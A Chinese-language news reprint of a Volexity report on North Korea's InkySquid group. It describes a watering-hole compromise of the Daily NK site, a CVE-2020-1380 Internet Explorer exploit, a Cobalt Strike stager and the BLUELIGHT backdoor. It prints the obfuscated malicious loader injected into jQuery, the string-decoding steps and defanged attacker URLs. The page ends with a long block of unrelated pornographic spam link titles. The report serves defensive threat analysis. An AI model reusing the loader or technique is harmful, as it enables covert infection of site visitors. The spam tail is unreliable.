《電子技術(shù)應(yīng)用》
您所在的位置:首頁(yè) > 通信與網(wǎng)絡(luò) > 業(yè)界動(dòng)態(tài) > 朝鮮InkySquid APT組織利用瀏覽器漏洞感染受害者

朝鮮InkySquid APT組織利用瀏覽器漏洞感染受害者

2021-08-28
來(lái)源:嘶吼專業(yè)版
關(guān)鍵詞: 瀏覽器 漏洞感染

  朝鮮InkySquid APT組織利用瀏覽器漏洞感染受害者。

  2021年4月,Volexity研究人員識(shí)別出了通過(guò)www.dailynk[.]com網(wǎng)站加載到惡意子域名的jquery[.]services可疑代碼。加載惡意代碼的URL包括:

  hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

  hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

  這些URL指向的是Daily NK網(wǎng)站使用的合法文件,但是內(nèi)容被攻擊者修改了,其中包含重定向用戶從攻擊者控制的域名jquery[.]services加載惡意JS。攻擊者控制的代碼只加入了很短的時(shí)間就被移除了,使得攻擊者活動(dòng)的識(shí)別變得非常困難。

  CVE-2020-1380

  Volexity研究人員發(fā)現(xiàn)攻擊者利用的首個(gè)漏洞是CVE-2020-1380,一個(gè)IE 0 day漏洞利用。攻擊者在Daily NK網(wǎng)站的下述合法文件中加入了一行代碼:

  hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

  加入到Daily NK網(wǎng)站的混淆的代碼如下:

  function vgrai(){var e=document.createElement(“script”);e.src=fecet(“w6625I》7x=y37t4;=5t48xrt5>4t52105x8t<t:6t0s=/x0=y5”,15),document.head&&document.head.appendChild(e)}function vdgie(){const e=window.navigator.userAgent,t=e.indexOf(“rv:11.0 ”),i=e.indexOf(“Trident/”);return t>0||i>0}vdgie()&&vgrai();

  加入以上代碼后,如果用戶用IE來(lái)訪問(wèn)Daily NK,頁(yè)面就會(huì)從以下URL加載其他的JS文件:

  hxxps://ui.jquery[.]services/responsive-extend.min.js

  請(qǐng)求時(shí),由于有正確的IE User-Agent,主機(jī)就會(huì)作為其他混淆的JS代碼。初始重定向后,攻擊者會(huì)選擇將惡意代碼隱藏在合法代碼中。在本例中,攻擊者使用了“bPopUp” JS庫(kù)。這一選擇具有2個(gè)結(jié)果:

  分析JS的人可能會(huì)誤認(rèn)為其是合法的,因?yàn)榇蠖鄶?shù)代碼都是非惡意的;

  識(shí)別惡意JS代碼的自動(dòng)化解決方案也可能會(huì)誤認(rèn)為這些代碼是非惡意的,因?yàn)榇a大部分可以與合法庫(kù)內(nèi)容匹配。

  攻擊者使用的漏洞利用代碼中還包含許多混淆在變量中的字符串,以使其顯得像合法的SVG內(nèi)容。攻擊者隱藏字符串的示例如圖1所示:

  圖 1. SVG變量中混淆的字符串

  為解密這些字符串,需要執(zhí)行以下步驟:

  通過(guò)M43.2字符串將path變量中的d屬性中的數(shù)據(jù)分割開(kāi)來(lái);

  將分割出的數(shù)據(jù)的每個(gè)元素通過(guò)空格符再次分割,會(huì)得到一個(gè)數(shù)字列表;

  將這些數(shù)字轉(zhuǎn)成整數(shù);

  如果整數(shù)大于30,就減去17,并加到生成的字符串中。如果整數(shù)小于等于30,就丟棄該數(shù)字。

  總的來(lái)看,一共使用了3個(gè)假的SVG對(duì)象。一旦這些對(duì)象中的字符串替換為JS,識(shí)別漏洞利用就很容易了。解密和替換后的代碼如圖2所示:

  圖 2. CVE-2020-1380實(shí)現(xiàn)

  代碼對(duì)應(yīng)的是TrendMicro研究人員發(fā)布的CVE-2020-1380漏洞PoC代碼。

  成功利用后,JS會(huì)使用相同的方法來(lái)解密最終的SVG變量,最終生成一個(gè)十六進(jìn)制編碼的Cobalt Strike stager,然后解碼和執(zhí)行。本例中,下載其他shellcode的URL包括:

  hxxps://ui.jquery[.]services/swipeout.min.js

  hxxps://ui.jquery[.]services/swipeout.min.css

  hxxps://ui.jquery[.]services/slider.min.css

  BLUELIGHT

  在另一個(gè)樣本中,攻擊者使用jquery[.]services子域名來(lái)存放一個(gè)新的惡意軟件家族。文件存放位置為:

  hxxps://storage.jquery[.]services/log/history

  history文件是一個(gè)XOR編碼的定制惡意軟件副本,惡意軟件開(kāi)發(fā)者和Volexity都將其命名為BLUELIGHT。命名依據(jù)是惡意軟件PDB字符串:

  E:\Development\BACKDOOR\ncov\Release\bluelight.pdb

  BLUELIGHT是Cobalt Strike成功傳播后的第二個(gè)payload。BLUELIGHT惡意軟件使用不同的云服務(wù)提供商作為C2。惡意軟件樣本使用Microsoft Graph API進(jìn)行C2操作。最開(kāi)始的時(shí)候,BLUELIGHT使用硬編碼的參數(shù)來(lái)進(jìn)行oauth 2 token認(rèn)證??蛻舳苏J(rèn)證后,BLUELIGHT就會(huì)在OneDrive appfolder文件夾下創(chuàng)建子目錄,創(chuàng)建的子目錄名有:

  logo

  normal

  background

  theme

  round

  文件夾和子目錄建立后,就會(huì)以JSON對(duì)象的格式來(lái)收集以下信息:

  用戶名

  計(jì)算機(jī)名

  操作系統(tǒng)版本

  Web IP

  默認(rèn)接口的本地IP

  本地時(shí)間

  植入的二進(jìn)制文件是32位還是64位

  進(jìn)程SID授權(quán)登記

  進(jìn)程文件名

  安裝的反病毒軟件列表

  受感染的機(jī)器是否運(yùn)行虛擬機(jī)

  這些數(shù)據(jù)會(huì)經(jīng)過(guò)XOR編碼為一個(gè)二進(jìn)制blob并上傳。所有上傳的文件都會(huì)以。jpg作為擴(kuò)展,不同的子目錄和文件名表明不同類型的命令數(shù)據(jù)。

  C2循環(huán)在初始上傳偵查數(shù)據(jù)后開(kāi)始,大約30秒循環(huán)一次。前5分鐘內(nèi),每個(gè)循環(huán)會(huì)截圖,并以時(shí)間戳作為文件名上傳到normal子目錄。5分鐘后,截圖每隔5分鐘上傳一次。

  在每個(gè)循環(huán)中,客戶端會(huì)通過(guò)美劇background子目錄來(lái)查詢新的命令。文件名表明要執(zhí)行的命令,文件的內(nèi)容提供命令相關(guān)的進(jìn)一步信息。支持的命令包括:

  執(zhí)行和下載shellcode

  下載和啟動(dòng)可執(zhí)行文件,然后上傳程序輸出

  獲取IE、Edge、Chrome、Naver Whale等支持的瀏覽器中的cookie和密碼數(shù)據(jù)庫(kù)

  遞歸檢索路徑和上傳文件元數(shù)據(jù);

  產(chǎn)生一個(gè)進(jìn)程來(lái)遞歸檢索路徑,以zip文件形式上傳文件;

  中止文件上傳線程。

  卸載。

  命令文件在處理后會(huì)被刪除,大多數(shù)命令生成的文件會(huì)上傳到round目錄。但zip upload會(huì)使用theme子目錄。




電子技術(shù)圖片.png

本站內(nèi)容除特別聲明的原創(chuàng)文章之外,轉(zhuǎn)載內(nèi)容只為傳遞更多信息,并不代表本網(wǎng)站贊同其觀點(diǎn)。轉(zhuǎn)載的所有的文章、圖片、音/視頻文件等資料的版權(quán)歸版權(quán)所有權(quán)人所有。本站采用的非本站原創(chuàng)文章及圖片等內(nèi)容無(wú)法一一聯(lián)系確認(rèn)版權(quán)者。如涉及作品內(nèi)容、版權(quán)和其它問(wèn)題,請(qǐng)及時(shí)通過(guò)電子郵件或電話通知我們,以便迅速采取適當(dāng)措施,避免給雙方造成不必要的經(jīng)濟(jì)損失。聯(lián)系電話:010-82306118;郵箱:aet@chinaaet.com。
亚洲一区二区欧美_亚洲丝袜一区_99re亚洲国产精品_日韩亚洲一区二区
女同一区二区| 欧美午夜大胆人体| 正在播放亚洲| 日韩系列欧美系列| 亚洲精品一区二区在线| 久久国产综合精品| 久久爱另类一区二区小说| 午夜在线视频观看日韩17c| 亚洲精品少妇30p| 国产精品老牛| 国产精品一区二区三区四区五区| 国产精品美女| 国产精品免费一区二区三区在线观看 | 亚洲影院污污.| 洋洋av久久久久久久一区| 亚洲精品日产精品乱码不卡| 亚洲美女视频在线观看| 夜夜嗨av一区二区三区四季av| 亚洲乱码视频| 一区二区动漫| 亚洲免费网址| 欧美在线网址| 亚洲国产一区二区三区青草影视| 亚洲电影下载| 99国产成+人+综合+亚洲欧美| 99re热这里只有精品视频| 99在线热播精品免费99热| 亚洲视频视频在线| 欧美一级免费视频| 久久一区二区三区av| 欧美大片免费观看| 欧美特黄一区| 国产午夜亚洲精品不卡| 加勒比av一区二区| 91久久国产综合久久| 一区二区三区偷拍| 性高湖久久久久久久久| 亚洲高清激情| 一本色道久久精品| 欧美一区二区高清在线观看| 久久综合九色综合欧美狠狠| 欧美精品色一区二区三区| 国产精品大片免费观看| 国产一区二三区| 亚洲第一精品久久忘忧草社区| 亚洲美女淫视频| 性欧美videos另类喷潮| 最新高清无码专区| 亚洲一区二区三区久久| 久久久激情视频| 欧美精品在线看| 国产精品最新自拍| 亚洲国产美女精品久久久久∴| 夜夜嗨av一区二区三区网站四季av | 在线播放日韩| av成人毛片| 欧美一区二区在线播放| 亚洲美女91| 欧美在线观看你懂的| 男人的天堂亚洲| 国产精品久久久久999| 激情五月婷婷综合| 一区二区三区精品视频| 久久精品亚洲一区二区| 一级成人国产| 久久婷婷人人澡人人喊人人爽| 欧美日韩成人在线| 国产在线观看一区| 亚洲视频电影图片偷拍一区| 亚洲电影自拍| 亚洲欧美日韩在线综合| 欧美成人一区二区三区| 国产欧美婷婷中文| 亚洲精品日韩一| 久久精品123| 亚洲免费中文| 欧美精品一区二区三区很污很色的| 国产欧美日韩亚洲| 亚洲日韩中文字幕在线播放| 欧美影院午夜播放| 亚洲欧美激情精品一区二区| 欧美精品乱码久久久久久按摩| 国产日韩欧美视频在线| 99re国产精品| 亚洲精品无人区| 久久蜜臀精品av| 国产精品天天看| 一本一本久久a久久精品牛牛影视| 亚洲第一区在线观看| 欧美制服丝袜| 国产精品免费一区豆花| 99精品免费| 亚洲免费观看高清在线观看| 久久一二三四| 狠狠久久亚洲欧美专区| 午夜精品视频一区| 亚洲欧美成人一区二区在线电影| 欧美精品七区| 亚洲国产视频一区| 亚洲国产精品成人一区二区| 久久gogo国模裸体人体| 国产精品你懂的在线| 99热这里只有精品8| 99亚洲伊人久久精品影院红桃| 玖玖视频精品| 一区二区三区在线观看视频| 欧美亚洲视频一区二区| 午夜精品久久久久久99热软件| 欧美日韩精选| 亚洲美女性视频| 一本大道久久a久久综合婷婷| 欧美激情视频一区二区三区不卡| 亚洲成人原创| 亚洲黄色免费| 欧美jjzz| 91久久国产精品91久久性色| 亚洲精品综合精品自拍| 欧美国产第二页| 亚洲精品国产精品国自产观看浪潮 | 国产美女精品| 亚洲欧美日韩一区在线| 香蕉成人伊视频在线观看| 国产精品大全| 午夜精品婷婷| 久久精品视频在线观看| 国产亚洲成年网址在线观看| 欧美一区二区视频97| 久久天堂av综合合色| 精品电影在线观看| 亚洲欧洲另类国产综合| 欧美激情一区二区三区高清视频 | 99精品国产一区二区青青牛奶| 欧美日本韩国一区二区三区| 亚洲精品资源美女情侣酒店| 在线亚洲精品福利网址导航| 国产精品成人av性教育| 亚洲一区二区三区色| 久久不射2019中文字幕| 黄色成人在线网站| 亚洲激情综合| 欧美日韩精品免费看| 国产精品99久久久久久久久久久久 | 久久精品国产一区二区三| 国语自产精品视频在线看| 亚洲欧洲久久| 欧美三级视频在线观看| 亚洲免费一区二区| 久久久女女女女999久久| 亚洲高清一区二区三区| 亚洲视频中文字幕| 国产欧美日韩免费| 亚洲经典在线看| 欧美视频不卡中文| 欧美一级片在线播放| 欧美96在线丨欧| 99视频在线观看一区三区| 欧美一站二站| 亚洲高清一区二区三区| 亚洲一区二区在线观看视频| 国产乱肥老妇国产一区二| 久久精品人人做人人爽| 欧美精品 日韩| 亚洲综合色在线| 美腿丝袜亚洲色图| 亚洲视频一区二区在线观看| 久久久水蜜桃av免费网站| 亚洲国产综合91精品麻豆| 亚洲欧美激情一区| 在线精品一区| 午夜精品一区二区三区电影天堂 | 免费成年人欧美视频| 99热这里只有成人精品国产| 欧美在线视频a| 亚洲国产精品999| 欧美一级播放| 最新亚洲电影| 久久大逼视频| 亚洲乱码日产精品bd| 久久久久国产精品午夜一区| 99ri日韩精品视频| 久热re这里精品视频在线6| 亚洲午夜精品久久| 欧美成人午夜视频| 香蕉av福利精品导航| 欧美久久在线| 久久成人久久爱| 欧美性猛交xxxx乱大交蜜桃| 久久精品五月| 国产精品资源在线观看| 99riav久久精品riav| 国产一区二区三区网站| 亚洲在线一区二区| 亚洲国产天堂久久综合| 久久精品人人做人人爽电影蜜月| 亚洲美女中文字幕| 久热精品视频在线观看| 亚洲欧美日韩人成在线播放| 欧美精品一区二区三区在线看午夜 | 中国成人亚色综合网站| 欧美成人综合网站|